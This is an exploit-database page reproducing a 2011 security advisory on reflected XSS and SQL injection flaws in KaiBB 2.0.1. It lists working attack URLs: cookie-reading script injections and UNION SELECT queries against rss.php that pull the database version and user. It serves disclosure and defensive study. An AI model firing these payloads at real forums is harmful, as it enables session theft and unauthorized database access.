header-logo
Suggest Exploit
vendor:
KaiBB
by:
Stefan Schurtz
N/A
CVSS
N/A
XSS and SQL Injection
N/A
CWE
Product Name: KaiBB
Affected Version From: KaiBB 2.0.1
Affected Version To: KaiBB 2.0.1
Patch Exists: NO
Related CWE: -
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

KaiBB 2.0.1 XSS and SQL Injection vulnerabilities

KaiBB 2.0.1 is prone to XSS and SQL Injection vulnerabilities. Cross-site Scripting: http://<target>/kaibb/?'</script><script>alert(document.cookie)</script> http://<target>/kaibb/index.php?'</script><script>alert(document.cookie)</script> SQL Injection: http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL AND 'a'='a http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, version(), NULL, NULL, NULL, NULL, NULL AND 'a'='a http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, user(), NULL, NULL, NULL, NULL, NULL AND 'a'='a

Mitigation:

-
Source

Exploit-DB raw data:

Advisory:              		KaiBB 2.0.1 XSS and SQL Injection vulnerabilities
Advisory ID:           	SSCHADV2011-027
Author:                		Stefan Schurtz
Affected Software:  	Successfully tested on KaiBB 2.0.1
Vendor URL:          	http://code.google.com/p/kaibb/
Vendor Status:       	informed
CVE-ID:                	 	-

==========================
Vulnerability Description:
==========================

KaiBB 2.0.1 is prone to XSS and SQL Injection vulnerabilities

==================
Technical Details:
==================

Cross-site Scripting

http://<target>/kaibb/?'</script><script>alert(document.cookie)</script>
http://<target>/kaibb/index.php?'</script><script>alert(document.cookie)</script>

SQL Injection

http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL AND 'a'='a
http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, version(), NULL, NULL, NULL, NULL, NULL AND 'a'='a
http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, user(), NULL, NULL, NULL, NULL, NULL AND 'a'='a

=========
Solution:
=========

-

====================
Disclosure Timeline:
====================

08-Oct-2011 - informed developers
08-Oct-2011 - release date of this security advisory

========
Credits:
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References:
===========

http://code.google.com/p/kaibb/
http://code.google.com/p/kaibb/issues/detail?id=2
http://www.rul3z.de/advisories/SSCHADV2011-027.txt

Navigation

Suggest Exploit

Services By CQR